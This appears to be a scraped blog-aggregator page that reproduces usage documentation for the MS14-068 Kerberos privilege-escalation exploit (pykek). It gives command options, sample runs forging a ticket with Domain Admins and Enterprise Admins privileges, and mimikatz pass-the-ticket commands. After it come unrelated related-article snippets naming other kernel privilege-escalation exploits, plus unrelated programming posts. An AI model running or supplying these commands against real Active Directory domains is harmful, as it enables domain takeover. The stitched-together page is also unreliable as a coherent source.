https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of
an Active Directory domain to get a Kerberos ticket for an existing
domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:

    -p <clearPassword>

--rc4 <ntlmHash>

Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc
-s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Password:

  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!

  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!

  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!

  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!

  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!

  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!

root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

http://zone.wooyun.org/content/17102

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员的更多相关文章

  1. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  2. [EXP]Memu Play 6.0.7 - Privilege Escalation

    # Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  5. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  6. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  7. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

随机推荐

  1. TinyXML 在vs2010 VC++使用

    1.下载TinyXML  http://www.grinninglizard.com/tinyxml/  解压缩,将以下六个文件复制到您的工程项目文件(跟您的cpp文件在一个目录下)中 tinyxml ...

  2. Gym 100801D Distribution in Metagonia (数学思维题)

    题目:传送门.(需要下载PDF) 题意:t组数据,每组数据给定一个数ni(1 ≤ ni ≤ 10^18),把ni拆成尽可能多的数,要求每个数的素因子只包含2和3,且这些数不能被彼此整除,输出一共能拆成 ...

  3. 6个朋友(codevs 2832)

    2832 6个朋友  时间限制: 1 s  空间限制: 128000 KB  题目等级 : 黄金 Gold 题解       题目描述 Description 有这么一种说法:认识6个人,你就认识全世 ...

  4. Android实现支持缩放平移图片

    本文主要用到了以下知识点 Matrix GestureDetector 能够捕捉到长按.双击 ScaleGestureDetector 用于检测缩放的手势 自由的缩放 需求:当图片加载时,将图片在屏幕 ...

  5. cocos2dx实现经典飞机大战

    游戏开始层 #ifndef __LayerGameStart_H__ #define __LayerGameStart_H__ #include "cocos2d.h" USING ...

  6. 一、HTML和CSS基础--HTML+CSS基础课程--第2部分

    第三章 与浏览器交互,表单标签 使用表单标签,与用户交互
网站怎样与用户进行交互?答案是使用HTML表单(form).表单是可以把浏览者输入的数据传送到服务器端,这样服务器端程序就可以处理表单传过来的 ...

  7. 查询DDOS攻击IP列表 grep -i

    [root@xsx ~]# netstat -an|grep -i syn_recv|awk '{print $5}'|awk -F\: '{print $1}'|sort|uniq -c 1 149 ...

  8. .net学习笔记----会话状态Session

    一.会话状态Session Session用于服务器端状态管理,使用Session之后,每个客户端都可以将实际的数据保存在服务器上,对于每个客户端的数据,将会生成一个对应的唯一的key(保存在客户端) ...

  9. PIGOSS

    http://blog.sina.com.cn/s/blog_865bc4c60102wkb1.html

  10. hrbustoj 1179:下山(DFS+剪枝)

    下山Time Limit: 1000 MS Memory Limit: 65536 KTotal Submit: 271(111 users) Total Accepted: 129(101 user ...